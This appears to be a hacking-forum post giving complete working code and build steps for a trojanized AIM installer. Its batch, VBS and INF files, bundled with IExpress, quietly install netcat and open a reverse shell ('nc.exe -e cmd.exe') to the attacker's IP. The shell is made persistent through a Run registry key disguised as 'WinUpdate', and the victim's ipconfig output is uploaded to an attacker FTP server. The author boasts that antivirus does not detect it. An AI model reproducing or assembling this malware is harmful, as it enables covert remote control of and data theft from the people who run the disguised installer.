Java v2.0
Current Progress on Java Installer Payload v2.0
[li]Completely Stealthed[/li]
[li]Bound to aim.exe (or any .exe installer you like)[/li]
[li]Reverse shell on port 69[/li]
[li]WORKS EVEN IF VICTIM HAS A ROUTER[/li]
[li]Implements an ipconfig /all > %computername%.txt[/li]
[li]Uploads "%computername%.txt to an FTP server (I am going to include the code but with my FTP info taken out)[/li]
[li]Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)[/li]
[li]WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN[/li]
[li]And last but hopefully not the least, Anti virus does not pickup any of it. :D:D[/li]
Teh Codez
jvabd.bat:
@echo off
:: Executing IPCONFIG and creating .txt
ipconfig /all > c:WindowsSystem32%Computername%.txt
cls
:: Executing Script to send ipaddr to ftp :D
CALL .hidden.vbs script.bat
:: Quitting
GOTO End
:End
hidden.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
script.bat
MAKE SURE YOU EDIT THE NECESSARY FIELDS
@ECHO OFF
:: Create the temporary script file
> script.ftp ECHO USER YOURUSERNAME
>>script.ftp ECHO PASSWORD
>>script.ftp ECHO binary
>>script.ftp ECHO prompt n
>>script.ftp ECHO put "C:WindowsSystem32%computername%.txt"
>>script.ftp ECHO QUIT
::Connect to the ftp and run the script
FTP -v -s:script.ftp FTPSERVER
:: Overwriting the temp script so this never happened :D
TYPE NUL >script.ftp
DEL script.ftp
EXIT
Setup.inf
MAKE SURE YOU EDIT THE NECESSARY FIELDS
; This INF File will install netcat in the TARGET system32 directory and implement the following command
; "nc.exe -e cmd.exe 0.0.0.0 69";where 0.0.0.0 is YOUR EXTERNAL ip address
; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69
; any time you create a listen server on your computer
; Lets Begin:
[Version]
Signature="$Chicago$"
AdvancedINF=2.0
[DefaultInstall]
Copyfiles=install.files
Copyfiles=installer.files
RunPostSetupCommands=RunPostSetupCommandsSection
AddReg=Add.Settings
[DestinationDirs]
; If you are using a different .exe installer switch the directory HERE
install.files=30,/Windows/System32
installer.files=30,/Program Files/AOL Instant Messenger
[install.files]
; These are the pwnage programs that will be installed into system32
jvabd.bat;ipconfig /all txt creator
script.bat;autoconnect to ftp and upload ipconfig txt :D
nc.exe; netcat of course:
nircmd.exe;hides cmd window
hidden.vbs; hides cmd window while executing a batch in a batch
setup.inf;inf file
[installer.files]
; The aim installer that installs into /program files/aol instant messenger;)
; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE
aim.exe
[Add.Settings]
; Adding registry key to make nc run on boot :D
; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D
HKLM,SoftwareMicrosoftWindowsCurrentVersionRun,WinUpdate, 0x00000000, "C:WindowsSystem32nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"
[RunPostSetupCommandsSection]
; Programs are going to be listed in order of execution, including parameters (nc :D):
; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP
; If you have a different .exe installer replace aim.exe with your.exe once again
nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
nircmd.exe execmd CALL jvabd.bat
aim.exe
[SourceDiskNames]
1="default",,1
[br]
Instructions on creating the installer
[br]
Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf its time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Dont worry when you run the compiled version only the installer is shown, everything else gets stealth installed.
Now, when you have these 7 things inside a folder its time to compile them into one. *Note* I have not found a method of doing this on linux or mac yet, being as they dont use .exe's" Click start - run - iexpress.exe. Choose "create new..." then click on "Extract files then run an installation command" Create a package title (i did AIM 5.9.8) )then decide whether or not u want a confirmation message (This will install blah blah, are you sure?) Next skip the license crap and you will see "Package Files". Click add, browse to your folder with the pwnage in it, and add all 7 items (including your.exe installer).
Click next, on the next screen under "Install Program" choose SETUP.INF not YOUR.EXE INSTALLER and leave the post install command. Click next, leave the show window setting at recommended, click next, create a finished message if you like. Click next, name your installer.exe and choose the place you want to save it, also check the "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click next, create the package, and you now have a legit installer that includes pwange :D.
**IF YOU USE THIS AND GET FUCKED ITS NOT MY FAULT**